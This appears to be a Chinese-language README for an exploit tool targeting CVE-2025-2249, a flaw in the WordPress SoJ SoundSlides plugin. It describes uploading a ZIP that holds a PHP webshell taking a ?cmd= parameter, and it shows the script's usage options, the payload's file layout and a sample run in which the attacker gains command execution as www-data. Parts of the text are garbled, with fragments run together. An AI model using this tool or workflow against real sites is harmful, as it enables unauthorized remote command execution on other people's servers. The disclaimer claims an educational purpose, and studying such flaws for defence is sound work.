⚠️ 免责声明: 此漏洞利用程序仅用于教育和授权测试目的。
SoJ SoundSlides 插件允许具有贡献者或更高角色的已认证用户上传任意 ZIP 文件。由于缺少验证,攻击者可以上传 PHP webshell,这些 webshell 会被解压并从 web 可访问目录中执行。
拥有有效 WordPress 凭据的攻击者可以:
?cmd=)usage: CVE-2025-2249.py [-h] -u URL -un USERNAME -p PASSWORD
Exploit for CVE-2025-2249 | WordPress SoJ SoundSlides Plugin # By Nxploited | Khaled ALenazi,
options:
-h, --help show this help message and exit
-u, --url URL WordPress base URL
-un, --username USERNAME
WordPress username
-p, --password PASSWORD
WordPress password
| 参数 | 描述 |
|---|---|
-u | WordPress 基础 URL |
-un | WordPress 用户名 |
-p | WordPress 密码 |
readme.txt 检查版本nxploit/
├── index.html
├── data/
│ └── data.xml
├── audio/
│ └── audio.mp3
└── nxploit.php ← PHP shell (?cmd=)
[*] Checking plugin version...
[+] Vulnerable version detected.
[*] Logging in...
[+] Login successful.
[*] Uploading shell...
[*] Shell uploaded: http://target/wp-content/uploads/SoundSlides/nxploit_shell/nxploit.php
> whoami
www-data
wp-content/uploads/ 目录中的意外 .php 文件由 [Nxploited | Khaled ALenazi] 用 ❤️ 构建
用于教育、意识和防御。
安全是每个人的责任。始终进行道德测试、负责任地报告,并保护 Web。